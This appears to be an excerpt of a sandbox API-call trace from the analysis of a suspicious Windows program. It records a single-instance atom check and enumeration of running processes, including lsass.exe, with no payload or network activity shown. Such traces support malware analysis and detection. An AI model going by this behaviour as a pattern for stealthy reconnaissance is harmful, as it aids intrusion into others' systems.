	[0073.672] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.672] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0073.672] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.672] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.673] GetLastError () returned 0x5
	[0073.674] GetLastError () returned 0x5
	[0073.674] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.674] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0073.674] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.674] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0073.674] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0073.674] CloseHandle (hObject=0x224) returned 1
	[0073.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0073.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0073.674] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.674] CloseHandle (hObject=0x224) returned 1
	[0073.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0073.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0073.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0073.675] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.675] CloseHandle (hObject=0x224) returned 1
	[0073.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0073.712] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0073.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0073.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0073.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772158, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0073.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0073.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0073.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0073.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0073.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0073.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0073.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0073.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0073.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0073.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0073.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0073.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0073.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0073.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0073.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0073.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0073.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0073.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0073.716] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.716] CloseHandle (hObject=0x224) returned 1
	[0073.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0073.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0073.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0073.717] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.717] CloseHandle (hObject=0x224) returned 1
	[0073.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728a58, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0073.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0073.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0073.717] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.717] CloseHandle (hObject=0x224) returned 1
	[0073.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0073.717] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.717] CloseHandle (hObject=0x224) returned 1
	[0073.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0073.718] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.718] CloseHandle (hObject=0x224) returned 1
	[0073.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0073.718] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.718] CloseHandle (hObject=0x224) returned 1
	[0073.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0073.718] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.718] CloseHandle (hObject=0x224) returned 1
	[0073.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0073.718] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.718] CloseHandle (hObject=0x224) returned 1
	[0073.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0073.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0073.718] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.718] CloseHandle (hObject=0x224) returned 1
	[0073.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0073.719] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.719] CloseHandle (hObject=0x224) returned 1
	[0073.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0073.719] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.719] CloseHandle (hObject=0x224) returned 1
	[0073.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728838, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0073.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0073.719] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.719] CloseHandle (hObject=0x224) returned 1
	[0073.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728a18, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0073.719] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.719] CloseHandle (hObject=0x224) returned 1
	[0073.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd30, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0073.719] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.720] CloseHandle (hObject=0x224) returned 1
	[0073.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0073.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0073.720] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.720] CloseHandle (hObject=0x224) returned 1
	[0073.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea68, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0073.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0073.720] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.720] CloseHandle (hObject=0x224) returned 1
	[0073.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0073.720] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.720] CloseHandle (hObject=0x224) returned 1
	[0073.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0073.720] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.720] CloseHandle (hObject=0x224) returned 1
	[0073.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0073.720] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.720] CloseHandle (hObject=0x224) returned 1
	[0073.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
